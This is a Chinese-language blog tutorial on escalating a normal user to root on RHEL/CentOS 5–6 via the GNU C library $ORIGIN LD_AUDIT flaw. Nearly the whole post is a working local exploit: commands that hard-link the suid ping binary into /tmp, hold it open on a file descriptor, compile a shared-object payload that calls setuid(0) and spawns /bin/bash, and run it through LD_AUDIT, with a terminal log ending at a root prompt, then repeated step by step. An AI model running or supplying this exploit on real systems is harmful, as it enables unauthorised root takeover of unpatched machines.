提权教程:GNU C library动态链接区$ORIGIN溢出提权

Admin 2020-07-07 102人围观 ,发现0个评论 提权教程

利用tmp目录权限、suid 权限和C语言使普通帐号提权为ROOT权限


合适用 RHEL5-RHEL6 CENTOS5-CENTOS6 均可以提权


提权方法

 

提权教程:GNU C library动态链接区$ORIGIN溢出提权 Web安全 第1张

 

[moonsec@localhosttmp]$ mkdir /tmp/exploit
[moonsec@localhosttmp]$ ln /bin/ping /tmp/exploit/target
[moonsec@localhosttmp]$ exec 3< /tmp/exploit/target
[moonsec@localhosttmp]$ ls -l /proc/$$/fd/3
lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target
[moonsec@localhosttmp]$  rm -rf /tmp/exploit/
[moonsec@localhosttmp]$  ls -l /proc/$$/fd/3
lr-x------ 1moonsec moonsec 64 Dec 19 06:10 /proc/2799/fd/3 -> /tmp/exploit/target(deleted)


[moonsec@localhosttmp]$ cat > payload.c
void__attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}


[moonsec@localhosttmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[moonsec@localhosttmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1moonsec moonsec 4223 Dec 19 06:10 /tmp/exploit
[moonsec@localhosttmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
[root@localhosttmp]# whoami

 

创建目录


mkdir /tmp/exploit


创建target文件硬链接


ln /bin/ping/tmp/exploit/target


把target文件加载到内存中


exec 3< /tmp/exploit/target


查看target在内存中的情况


ls -l /proc/$$/fd/3


删除目录


rm -rf /tmp/exploit/


输入c代码


cat > payload.c
void__attribute__((constructor)) init()
{
   setuid(0);
   system("/bin/bash");
}

编译文件


gcc -w -fPIC-shared -o /tmp/exploit payload.c

 

提升root权限

LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3

提权教程:GNU C library动态链接区$ORIGIN溢出提权 Web安全 第2张

cetnots5.5 用户moonsec 提权到root权限

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客